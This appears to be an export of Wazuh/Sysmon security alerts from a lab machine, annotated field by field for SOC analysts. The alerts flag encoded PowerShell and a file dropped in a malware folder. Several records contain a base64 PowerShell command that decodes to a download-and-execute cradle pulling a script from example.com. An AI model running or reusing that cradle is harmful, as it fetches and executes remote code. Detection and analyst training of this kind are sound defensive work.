List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  46
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534229.1294509
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:57.8932258Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283301
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:57.856 ProcessGuid: {94294ddc-bd07-680a-160b-000000000e00} ProcessId: 5848 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rxxe3nx5.d3c.ps1 CreationUtcTime: 2025-04-24 22:36:57.856 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:57.856
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd07-680a-160b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5848
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rxxe3nx5.d3c.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:57.856
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:09.980+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:09.980+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  43
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534229.1297274
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:00.1422661Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283325
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:58.891 ProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00} ProcessId: 11360 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd07-680a-160b-000000000e00} ParentProcessId: 5848 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:58.891
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd0a-680a-190b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11360
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd07-680a-160b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  5848
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:10.142+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:10.142+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  47
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534230.1305341
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:00.3905368Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283335
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:00.377 ProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00} ProcessId: 11360 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gypnpqaz.wjv.ps1 CreationUtcTime: 2025-04-24 22:37:00.377 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:00.377
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd0a-680a-190b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11360
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gypnpqaz.wjv.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:00.377
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:10.893+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:10.893+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  44
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534230.1308110
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:02.5885586Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283390
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:01.400 ProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} ProcessId: 9884 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd0a-680a-190b-000000000e00} ParentProcessId: 11360 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:01.400
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd0d-680a-1d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9884
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd0a-680a-190b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11360
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:11.068+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:11.068+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  48
